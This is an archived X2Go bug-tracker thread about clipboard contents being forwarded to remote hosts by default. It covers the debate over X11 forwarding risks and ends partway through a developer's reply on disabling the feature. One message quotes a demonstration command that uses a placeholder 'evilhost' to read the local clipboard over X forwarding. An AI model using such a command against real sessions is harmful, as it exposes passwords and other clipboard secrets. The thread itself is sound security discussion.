X2Go Bug report logs - #524
Provide support in X2Go Server for making clipboard

version graph

Package: x2goserver; Maintainer for x2goserver is X2Go Developers <x2go-dev@lists.x2go.org>; Source for x2goserver is src:x2goserver.

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: pending, security

Fixed in version 4.0.1.16

Done: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Mon, 01 Jul 2013 02:48:02 GMT) (full text, mbox, link).


Acknowledgement sent to Christoph Anton Mitterer <calestyo@scientia.net>:
New Bug report received and forwarded. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Mon, 01 Jul 2013 02:48:02 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.x2go.org (full text, mbox, reply):

From: Christoph Anton Mitterer <calestyo@scientia.net>
To: submit@bugs.x2go.org
Subject: SECURITY: x2goclient allows clipboard sniffing
Date: Mon, 01 Jul 2013 04:38:28 +0200
Package: x2goclient
Severity: grave
Tags: security

Hi.

From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588


It seems that per default (and I even found no way to disable it)
x2goclient (and perhaps other
related tools?) transmit the content of the clipboard to the remote
host.

As this may easily contain passwords or other sensitive information,
this is a extremely
critical hole.


Cheers,
Chris.


Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Mon, 01 Jul 2013 12:03:02 GMT) (full text, mbox, link).


Acknowledgement sent to Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Mon, 01 Jul 2013 12:03:02 GMT) (full text, mbox, link).


Message #10 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Mon, 1 Jul 2013 13:43:56 +0200
On 13-07-01 04:56, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
> Package: x2goclient
> Severity: grave
> Tags: security
> 
> Hi.
> 
> From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
> 
> 
> It seems that per default (and I even found no way to disable it)
> x2goclient (and perhaps other related tools?) transmit the content of
> the clipboard to the remote host.

Yes, other related tools like X11. x2go is basically just a faster
version of the traditional xforwarding. In X11 every client can always
access the clipboard/selection/etc., so you will also have the same
security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
demonstrates this.

> As this may easily contain passwords or other sensitive information,
> this is a extremely critical hole.

I disagree, this is not a hole at all, it works as intended. Its just
that users are often not educated about the implications of passing
around passwords via the clipboard etc.

But I concur that the ability to switch off clipboard/selection/...
forwarding in the x2goagent/x2goclient would be nice to have. Patches
are of course always welcome.



Ciao,

Alexander Wuerstlein.


Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Mon, 01 Jul 2013 13:03:01 GMT) (full text, mbox, link).


Acknowledgement sent to Christoph Anton Mitterer <calestyo@scientia.net>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Mon, 01 Jul 2013 13:03:02 GMT) (full text, mbox, link).


Message #15 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Christoph Anton Mitterer <calestyo@scientia.net>
To: 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Mon, 01 Jul 2013 14:43:29 +0200
[Message part 1 (text/plain, inline)]
On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: 
> Yes, other related tools like X11. x2go is basically just a faster
> version of the traditional xforwarding. In X11 every client can always
> access the clipboard/selection/etc., so you will also have the same
> security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> demonstrates this.
Well but that "argument" doesn't really count:
1) Just because others do it plainly insecure, you cannot do it like
this as well... like as if Gentoo would say "if Debian breaks their
OpenSSL entropy, we should do so, too"... o.O

2) Literally no one who has a decent mind of security, will allow other
hosts do directly access their X server.. because then you're (security
wise) anyway screwed...
And I thought NX would secure what's sent from remote in order to not
being able to overtake the input/output devices of the hosts (whole)
Xserver).


> I disagree, this is not a hole at all, it works as intended. Its just
> that users are often not educated about the implications of passing
> around passwords via the clipboard etc.
Na I disagree... if even people would be educated (which is not
realistic) it will happen by accident, that you copy sensitive
information... sometimes other programs may do this even automatically
and you can't to anything against.


Cheers,
Chris.
[smime.p7s (application/x-pkcs7-signature, attachment)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Mon, 01 Jul 2013 14:03:02 GMT) (full text, mbox, link).


Acknowledgement sent to Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Mon, 01 Jul 2013 14:03:02 GMT) (full text, mbox, link).


Message #20 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Mon, 1 Jul 2013 16:01:32 +0200
On 13-07-01 15:03, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
> On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: 
> > Yes, other related tools like X11. x2go is basically just a faster
> > version of the traditional xforwarding. In X11 every client can always
> > access the clipboard/selection/etc., so you will also have the same
> > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> > demonstrates this.
> Well but that "argument" doesn't really count:
> 1) Just because others do it plainly insecure, you cannot do it like
> this as well... like as if Gentoo would say "if Debian breaks their
> OpenSSL entropy, we should do so, too"... o.O

It isn't like that at all, X11 clients and servers have to comply with
the respective parts of the protocol. If the protocol demands insecure
behaviour, its a design bug, or maybe, like in this case, a compromise
nobody likes: Since in X11 clients handle all the shortcuts and mouse
button events, since clients or toolkits handle the widgets, the only
option to implement C&P is to have clients ask the server for the
clipboard or selection contents. Its more a "there is no other way to do
it except to make it unusable" kind of problem imho.

> 2) Literally no one who has a decent mind of security, will allow other
> hosts do directly access their X server.. because then you're (security
> wise) anyway screwed...

I'm not only talking about 'xhost +' and the like, this would of course
be a major problem for more reasons than only the clipboard. And if you
wouldn't trust a host with 'ssh -X', then you also shouldn't trust it
with x2go. Just think of x2go as a variant of 'ssh -X' with image
compression and some extras. X11 protocol firewalling is not really one
of those extras. And since the x2goclient will always run in your local
X session, it will always be able to read your clipboard.

> And I thought NX would secure what's sent from remote in order to not
> being able to overtake the input/output devices of the hosts (whole)
> Xserver).

In a way, yes. Afaik you can avoid certain attacks of the "I'll attach
to the root window and get all key events" kind since windowed x2go
sessions give you a separate root window. But I imagine there are more
problems out there nobody thought of yet.



Ciao,

Alexander Wuerstlein.


Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 02 Jul 2013 01:33:01 GMT) (full text, mbox, link).


Acknowledgement sent to Christoph Anton Mitterer <calestyo@scientia.net>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 02 Jul 2013 01:33:01 GMT) (full text, mbox, link).


Message #25 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Christoph Anton Mitterer <calestyo@scientia.net>
To: 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Tue, 02 Jul 2013 03:27:49 +0200
[Message part 1 (text/plain, inline)]
Hey Alexander.

First,... I assume you're one of the NX/X2go developers?


On Mon, 2013-07-01 at 16:01 +0200, Alexander Wuerstlein wrote:
> It isn't like that at all, X11 clients and servers have to comply with
> the respective parts of the protocol. If the protocol demands insecure
> behaviour, its a design bug, or maybe, like in this case, a compromise
> nobody likes: Since in X11 clients handle all the shortcuts and mouse
> button events, since clients or toolkits handle the widgets, the only
> option to implement C&P is to have clients ask the server for the
> clipboard or selection contents. Its more a "there is no other way to do
> it except to make it unusable" kind of problem imho.
Well first I may have a misunderstanding about how NX works, but more on
that below:

With respect to the issue (transferring the clipboard) itself:
Don't get this in anyway offensive! But I think it's plain simple:

It may easily happen that people copy (by intention/accidentally or even
automatically by software) stuff to the clipboard which contains
sensitive information, which in turn can be anything from passwords to
my private love letters ;-)

And people don't see x2go (or VNC, or rdp) like a direct access to their
X server (as in plain X forwarding with xauth and that like).
This might be a misunderstanding... but it's how many similar such
"VNC-like" connections (i.e. a screen output into _one single_ X window)
work.
E.g. when I connect to my qemu virtual machines, I don't have to worry,
that the VM can overtake my X server,... the same for Virtualbox... and
I hope/believe for VNC/TightVNC/etc. and rdp connections (rdesktop and
friends).

This includes that users don't expect (or at least they shouldn't have
to) that such connections allow wiretapping, e.g. if such a system
supports audio forwarding... it shouldn't allow the remote side to
activate my MIC and listen to what I say/sing/etc.

The same holds true for the clipboard... at least per default it
shouldn't be ever sent to the remote side (or vice versa)... and IF one
activates it... people should be warned with big warnings what this
could mean.


That this can indeed lead to compromise showed a recent attack we've had
on one our institutes' machines, where sensitive information was caught
via an X2go connection and later on used for other attacks.


Now for the technical side... admittedly I don't know the details of how
NX interacts with X... but there must be some way to achieve blocking of
the clipboard sync.
Even if the protocol demands to send some content,... well then simply
hook in an clear it always (per default).



Now more off topic about how NX interacts with X:

I understand that NX is not like VNC, where it's more like send the
pixbuffers.... and where you obviously have not much security problems
in terms of taking over the local X server, since it's more like
displaying JPEGS (of course VNC has much other security problems).

I haven't found out what RDP actually does... but I'd assume it's rather
similar to VNC?

Now with NX I understand it's compression at the X protocol level, so
"no JPEGs being transferred"... but where do remotes X protocol go to?
Directly into the local X? Or is it taken by NX/X2go and rendered as if
NX/X2go would be an X server that is displayed in a _single_ window of
another one (i.e. like Xephyr)?


> And if you
> wouldn't trust a host with 'ssh -X', then you also shouldn't trust it
> with x2go.
Well this is _really_ serious news...
So why? I mean that's what most people expect I guess.. like when you
connect via ssh, that the remote cannot take over your local system...
(unless some serious hole would be find in the ssh client ;) )


> Just think of x2go as a variant of 'ssh -X' with image
> compression and some extras. X11 protocol firewalling is not really one
> of those extras. And since the x2goclient will always run in your local
> X session, it will always be able to read your clipboard.
So it directly goes into the local X server? Wow... that's awful... like
a security nightmare...


> In a way, yes. Afaik you can avoid certain attacks of the "I'll attach
> to the root window and get all key events" kind since windowed x2go
> sessions give you a separate root window. But I imagine there are more
> problems out there nobody thought of yet.
Who would know for sure what is expected to be possible and what not?

I mean don't take this rude... but for me this basically makes NX
unusable, since I basically only use it to connect to more or less
untrusted nodes.
If that means these can take over my X, or even more... than good
night :-/



Cheers,
Chris.
[smime.p7s (application/x-pkcs7-signature, attachment)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 02 Jul 2013 07:18:02 GMT) (full text, mbox, link).


Acknowledgement sent to Nable 80 <nable.maininbox@googlemail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 02 Jul 2013 07:18:02 GMT) (full text, mbox, link).


Message #30 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Nable 80 <nable.maininbox@googlemail.com>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org, x2go-dev@lists.berlios.de
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Tue, 2 Jul 2013 11:10:18 +0400
Hi, Chris.

> So it directly goes into the local X server?
> Wow... that's awful... like a security nightmare...
Then, you don't use ssh -X/-Y, do you?

> And people don't see x2go (or VNC, or rdp) like a direct access
> to their X server (as in plain X forwarding with xauth and that like).
Why do you think so? Because they have it in window and didn't specify
any option that exactly means 'turn on X11 forwarding'?
After all, I think that it's not a grave issue as most people use X11
forwarding for rather trusted hosts (or just don't care).

One additional note: it's possible to turn on clipboard forwarding in
RDP and VNC (and it's a very useful thing) but AFAIR in most clients
_one have to specify it implicitly_ (and sometimes there's a separate
option that allows some restricted clipboard access, for example:
copying from remote to local but not vise versa). May be someone will
make a patch to implement such options in X2Go.


Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 02 Jul 2013 08:03:02 GMT) (full text, mbox, link).


Acknowledgement sent to Nable 80 <nable.maininbox@googlemail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 02 Jul 2013 08:03:02 GMT) (full text, mbox, link).


Message #35 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Nable 80 <nable.maininbox@googlemail.com>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org, x2go-dev@lists.berlios.de
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Tue, 2 Jul 2013 12:01:34 +0400
Sorry, quickfix:
s/implicitly/explicitely/

2013/7/2, Nable 80 <nable.maininbox@googlemail.com>:
> Hi, Chris.
>
>> So it directly goes into the local X server?
>> Wow... that's awful... like a security nightmare...
> Then, you don't use ssh -X/-Y, do you?
>
>> And people don't see x2go (or VNC, or rdp) like a direct access
>> to their X server (as in plain X forwarding with xauth and that like).
> Why do you think so? Because they have it in window and didn't specify
> any option that exactly means 'turn on X11 forwarding'?
> After all, I think that it's not a grave issue as most people use X11
> forwarding for rather trusted hosts (or just don't care).
>
> One additional note: it's possible to turn on clipboard forwarding in
> RDP and VNC (and it's a very useful thing) but AFAIR in most clients
> _one have to specify it implicitly_ (and sometimes there's a separate
> option that allows some restricted clipboard access, for example:
> copying from remote to local but not vise versa). May be someone will
> make a patch to implement such options in X2Go.
> _______________________________________________
> X2Go-Dev mailing list
> X2Go-Dev@lists.berlios.de
> https://lists.berlios.de/mailman/listinfo/x2go-dev
>


Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 02 Jul 2013 16:18:02 GMT) (full text, mbox, link).


Acknowledgement sent to Alexander Wuerstlein <arw@cip.cs.fau.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 02 Jul 2013 16:18:02 GMT) (full text, mbox, link).


Message #40 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Alexander Wuerstlein <arw@cip.cs.fau.de>
To: x2go-dev@lists.berlios.de
Cc: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Tue, 2 Jul 2013 18:07:52 +0200
On Tue, 02 Jul 2013 03:27:49 +0200
Christoph Anton Mitterer <calestyo@scientia.net> wrote:

> Hey Alexander.
> 
> First,... I assume you're one of the NX/X2go developers?

I've submitted some patches, yes. But I don't commit things as often as I would
want to.

> On Mon, 2013-07-01 at 16:01 +0200, Alexander Wuerstlein wrote:
> > It isn't like that at all, X11 clients and servers have to comply
> > with the respective parts of the protocol. If the protocol demands
> > insecure behaviour, its a design bug, or maybe, like in this case,
> > a compromise nobody likes: Since in X11 clients handle all the
> > shortcuts and mouse button events, since clients or toolkits handle
> > the widgets, the only option to implement C&P is to have clients
> > ask the server for the clipboard or selection contents. Its more a
> > "there is no other way to do it except to make it unusable" kind of
> > problem imho.
> Well first I may have a misunderstanding about how NX works, but more
> on that below:
> 
> And people don't see x2go (or VNC, or rdp) like a direct access to
> their X server (as in plain X forwarding with xauth and that like).
> This might be a misunderstanding... but it's how many similar such
> "VNC-like" connections (i.e. a screen output into _one single_ X
> window) work.
> E.g. when I connect to my qemu virtual machines, I don't have to
> worry, that the VM can overtake my X server,... the same for
> Virtualbox... and I hope/believe for VNC/TightVNC/etc. and rdp
> connections (rdesktop and friends).

Well, in that aspect, VNC, RDP and x2go/NX are somewhat different. VNC and RDP
basically started from some dumb kind of framebuffer and keyboard/mouse event
forwarding. X11 has a far larger amount of functionality and a huge system of
extensions on top. x2go/NX starts out from X11 and changes some aspects,
pruning things that are slow or unnecessary (e.g. synchronous calls or
uncompressed bitmaps). So while with VNC/RDP you have a very simple starting
point from which you then can add some extensions like clipboards, with
X11/x2go/NX you have everything and need to throw away stuff that might be bad.
People are still in the process of figuring out the bad stuff, and generally its
the far more hazardous direction of development.

> This includes that users don't expect (or at least they shouldn't have
> to) that such connections allow wiretapping, e.g. if such a system
> supports audio forwarding... it shouldn't allow the remote side to
> activate my MIC and listen to what I say/sing/etc.

Well, if you switch on audio forwarding in RDP, the other side can do exactly
that...

> The same holds true for the clipboard... at least per default it
> shouldn't be ever sent to the remote side (or vice versa)... and IF
> one activates it... people should be warned with big warnings what
> this could mean.

I agree that this would be desirable.

> That this can indeed lead to compromise showed a recent attack we've
> had on one our institutes' machines, where sensitive information was
> caught via an X2go connection and later on used for other attacks.

Do you have any more in-depth writeup of that attack so we maybe can learn from
it and look at certain things more specifically?

> Now for the technical side... admittedly I don't know the details of
> how NX interacts with X... but there must be some way to achieve
> blocking of the clipboard sync.
> Even if the protocol demands to send some content,... well then simply
> hook in an clear it always (per default).

Yes, that should be possible. Its just that someone has to implement it.

> Now more off topic about how NX interacts with X:
> 
> [...]
> Now with NX I understand it's compression at the X protocol level, so
> "no JPEGs being transferred"... but where do remotes X protocol go to?
> Directly into the local X? Or is it taken by NX/X2go and rendered as
> if NX/X2go would be an X server that is displayed in a _single_
> window of another one (i.e. like Xephyr)?

Some protocol calls are taken as is and passed to the local X, others are
"transformed", e.g. made asynchronous, bitmap-compressed, etc.

> > And if you
> > wouldn't trust a host with 'ssh -X', then you also shouldn't trust
> > it with x2go.
> Well this is _really_ serious news...
> So why? I mean that's what most people expect I guess.. like when you
> connect via ssh, that the remote cannot take over your local system...
> (unless some serious hole would be find in the ssh client ;) )

Well, the remote can't take over your system afaik. But there are concerns
about the security of ssh -X vs. -Y. Keystroke monitoring is one of those
concerns.

> > Just think of x2go as a variant of 'ssh -X' with image
> > compression and some extras. X11 protocol firewalling is not really
> > one of those extras. And since the x2goclient will always run in
> > your local X session, it will always be able to read your clipboard.
> So it directly goes into the local X server? Wow... that's awful...
> like a security nightmare...

Yes, it can be.

> > In a way, yes. Afaik you can avoid certain attacks of the "I'll
> > attach to the root window and get all key events" kind since
> > windowed x2go sessions give you a separate root window. But I
> > imagine there are more problems out there nobody thought of yet.
> Who would know for sure what is expected to be possible and what not?
> 
> I mean don't take this rude... but for me this basically makes NX
> unusable, since I basically only use it to connect to more or less
> untrusted nodes.
> If that means these can take over my X, or even more... than good
> night :-/

Yes, connections to untrusted hosts are problematic. For this I consider VNC to
be more suited.


Ciao,

Alexander Wuerstlein.


Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 02 Jul 2013 17:48:02 GMT) (full text, mbox, link).


Acknowledgement sent to Christoph Anton Mitterer <calestyo@scientia.net>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 02 Jul 2013 17:48:02 GMT) (full text, mbox, link).


Message #45 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Christoph Anton Mitterer <calestyo@scientia.net>
To: 258@bugs.x2go.org
Cc: x2go-dev@lists.berlios.de
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Tue, 02 Jul 2013 19:47:17 +0200
[Message part 1 (text/plain, inline)]
On Tue, 2013-07-02 at 18:07 +0200, Alexander Wuerstlein wrote: 
> Well, in that aspect, VNC, RDP and x2go/NX are somewhat different. VNC and RDP
> basically started from some dumb kind of framebuffer and keyboard/mouse event
> forwarding.
I knew (at least the VNC / RDP part)... and I started to realise the
difference from NX ;)

> X11 has a far larger amount of functionality and a huge system of
> extensions on top.
Sure...

>  x2go/NX starts out from X11 and changes some aspects,
> pruning things that are slow or unnecessary (e.g. synchronous calls or
> uncompressed bitmaps). So while with VNC/RDP you have a very simple starting
> point from which you then can add some extensions like clipboards, with
> X11/x2go/NX you have everything and need to throw away stuff that might be bad.
> People are still in the process of figuring out the bad stuff, and generally its
> the far more hazardous direction of development.
That's the problem... at least security wise... I mean it's no wonder
that no sane person uses ssh -X on other hosts (especially untrusted
ones)... the X protocol is so complex especially with all extensions..
and the typical attacks like global event grabbing or a "screen man in
the middle attack" where a new full screen window tricks you into
something evil... are probably just the simplest ideas of attacking.


> > This includes that users don't expect (or at least they shouldn't have
> > to) that such connections allow wiretapping, e.g. if such a system
> > supports audio forwarding... it shouldn't allow the remote side to
> > activate my MIC and listen to what I say/sing/etc.
> Well, if you switch on audio forwarding in RDP, the other side can do exactly
> that...
Sure... but at least you can turn it of (unfortunately many programs
don't do so by default, neither do they warn you what switching it on
means.


> > That this can indeed lead to compromise showed a recent attack we've
> > had on one our institutes' machines, where sensitive information was
> > caught via an X2go connection and later on used for other attacks.
> Do you have any more in-depth writeup of that attack so we maybe can learn from
> it and look at certain things more specifically?
Well the problem is that I'm not really allowed to give much defaults
(as you can see I also write from my private address)...
Simply said... an attacker took over root on the remote system... and it
seems he did just such sniffing stuff... :/


> > Now for the technical side... admittedly I don't know the details of
> > how NX interacts with X... but there must be some way to achieve
> > blocking of the clipboard sync.
> > Even if the protocol demands to send some content,... well then simply
> > hook in an clear it always (per default).
> 
> Yes, that should be possible. Its just that someone has to implement it.

AFAIU, one would need to do that on the nxproxy level then?


> > Now with NX I understand it's compression at the X protocol level, so
> > "no JPEGs being transferred"... but where do remotes X protocol go to?
> > Directly into the local X? Or is it taken by NX/X2go and rendered as
> > if NX/X2go would be an X server that is displayed in a _single_
> > window of another one (i.e. like Xephyr)?
> Some protocol calls are taken as is and passed to the local X, others are
> "transformed", e.g. made asynchronous, bitmap-compressed, etc.
I see...


> Well, the remote can't take over your system afaik. But there are concerns
> about the security of ssh -X vs. -Y. Keystroke monitoring is one of those
> concerns.
Why don't you do the following:
Not passing on any X stuff to the local X server... but staring an
Xephyr server and sending it there?

Admittedly I don't really know how the Xephyr server itself does things
(I once tried to ask the developers but got no reply)... and if that
would really work like a sandbox ...
At least my hope would be (as it was before with VNC/RDP/NX)... that any
evil remote... could at least only take over the one single window...
and in case of Xephyr... hopefully only the single Xephyr window.



First thanks for your answers...

I'd propose the following now:
As this bug is now cluttered all over with two different issues
- clipboard sniffing and the warning when it was activated
- security measures and better documentation about what NX/X2go really
does

I'd close this bug, and open two new ones, one for each issue...
referencing that old bug... so that all topics can be discussed (perhaps
fixed) in a more simple fashion.

Okay?


Cheers,
Chris.

[smime.p7s (application/x-pkcs7-signature, attachment)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 02 Jul 2013 18:03:01 GMT) (full text, mbox, link).


Acknowledgement sent to Christoph Anton Mitterer <calestyo@scientia.net>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 02 Jul 2013 18:03:01 GMT) (full text, mbox, link).


Message #50 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Christoph Anton Mitterer <calestyo@scientia.net>
To: x2go-dev@lists.berlios.de, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Tue, 02 Jul 2013 19:58:06 +0200
[Message part 1 (text/plain, inline)]
On Tue, 2013-07-02 at 11:10 +0400, Nable 80 wrote: 
> > And people don't see x2go (or VNC, or rdp) like a direct access
> > to their X server (as in plain X forwarding with xauth and that like).
> Why do you think so? Because they have it in window and didn't specify
> any option that exactly means 'turn on X11 forwarding'?
To be honest, I think both are strong reasons for expecting this... as
well as one easily tend to compare it with VNC (which gives you rather
the "secure" screenshots)...
But moreover... it's nowwhere really documented (at least where people
easily see it) - I didn't find it at all.
When one goes into the ssh/ssh_config manpages and read about the X
forwarding options... strongly warns one about the security implications
(which are basically like giving root to the remote).
When one reads the xauth manpage (and the fact that there is a dedicated
program which one needs to grant privileges)... one reads about what one
does.

With X2go/NX.. there seem to be no such emphasised warnings in the
obvious places.


> After all, I think that it's not a grave issue as most people use X11
> forwarding for rather trusted hosts (or just don't care).
Well... don't think so... even not for the trusted ones (not to talk
about untrusted hosts)... but this is probably since people have
different requirements on security.


> One additional note: it's possible to turn on clipboard forwarding in
> RDP and VNC (and it's a very useful thing) but AFAIR in most clients
> _one have to specify it implicitly_ (and sometimes there's a separate
> option that allows some restricted clipboard access, for example
Yes... it is... but there you have to at least enable it (even though
most programs miss a strong warning on what can then easily happen...)


But to be honest... the clipboard sniffing problem seems to be "boring"
compared with the "direct interaction" with my local x server... at
least with respect to my security thinking...


Oh and no one from the developers should get me wrong:
I do see that NX is very nice and great with respect to it's speed,
which is probably not doable with VNC like screenshoting.... but a) I
think people are not warned/told enough about what happens
(technically)... and b) clear information misses... on what could
actually happen (in the sense of "is it secure as it is, or can this
direct communication with the local X server cause troubles - perhaps
there are none... and they only issues where those with the global root
window.. which seems not possible with NX? But perhaps there are!).


Cheers,
Chris.
[smime.p7s (application/x-pkcs7-signature, attachment)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Wed, 03 Jul 2013 08:33:01 GMT) (full text, mbox, link).


Acknowledgement sent to Moritz Struebe <Moritz.Struebe@informatik.uni-erlangen.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Wed, 03 Jul 2013 08:33:01 GMT) (full text, mbox, link).


Message #55 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Moritz Struebe <Moritz.Struebe@informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org, x2go-dev@lists.berlios.de
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Wed, 03 Jul 2013 10:13:53 +0200
[Message part 1 (text/plain, inline)]
Hey.

On 2013-07-02 19:47, Christoph Anton Mitterer wrote:
> I'd propose the following now:
> As this bug is now cluttered all over with two different issues
> - clipboard sniffing and the warning when it was activated
> - security measures and better documentation about what NX/X2go really
> does
>
> I'd close this bug, and open two new ones, one for each issue...
> referencing that old bug... so that all topics can be discussed (perhaps
> fixed) in a more simple fashion.

I think this is a good Idea. I just want to warn you that this issue
will not have an very high priority, as most/all core devs work in
scenarios where host _and_ client are trusted. None the less
contributions to the documentation are very welcome, and can be easily
contributed without coding skills. ;) - If you need pointers on getting
started feel free to ask.

Morty


-- 
Dipl.-Ing. Moritz 'Morty' Struebe (Wissenschaftlicher Mitarbeiter)
Lehrstuhl für Informatik 4 (Verteilte Systeme und Betriebssysteme)
Friedrich-Alexander-Universität Erlangen-Nürnberg
Martensstr. 1
91058 Erlangen

Tel   : +49 9131 85-25419
Fax   : +49 9131 85-28732
eMail : struebe@informatik.uni-erlangen.de
WWW   : http://www4.informatik.uni-erlangen.de/~morty



[smime.p7s (application/pkcs7-signature, attachment)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#258; Package x2goclient. (Tue, 28 Jan 2014 15:50:01 GMT) (full text, mbox, link).


Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 28 Jan 2014 15:50:01 GMT) (full text, mbox, link).


Message #60 received at 258@bugs.x2go.org (full text, mbox, reply):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: x2go-user@lists.berlios.de
Cc: 258@bugs.x2go.org
Subject: Re: [X2Go-User] Limiting clipboard sharing
Date: Tue, 28 Jan 2014 15:49:10 +0000
[Message part 1 (text/plain, inline)]
Hi Kris,

On  Mo 27 Jan 2014 18:46:59 CET, Kris Ilowiecki wrote:

> Hello,
>
> I am quite new to X2Go, and really impressed by it. I'd like to  
> switch from opennx to X2Go, but I can't find a way to limit  
> clipboard sharing.
>
> Opennx, as well as other NX forks, has the options to enable clipboard
> sharing both ways, one-way, or disable it completely. So far I have  
> failed to find a setting to limit this in X2Go.
>
> I'd need clipboard sharing to work only in the client->server
> direction, or at least to disable it completely.
>
> I have searched for it for quite a while, but the best I have  
> managed to find is a bug report
> http://bugs.x2go.org/cgi-bin/bugreport.cgi?bug=258
> and a mailing list question without a single reply.
>
> Is there some way to configure it?
> If not, is it going to be hard to write a patch that would turn
> this off at compilation time?
> I've also been thinking of using some external programs to achieve  
> the effect, e.g. putting X2Go inside Xephyr, or the other way round...
>
> Any hints most welcome
>
> Many thanks,
> Kris

There should be two approaches...

 1) disable clipboard server-side for all users
 2) disable clipboard in X2Go Client / PyHoca-GUI on the client-side

The first is easy. Please look at /usr/bin/x2gostartagent of  
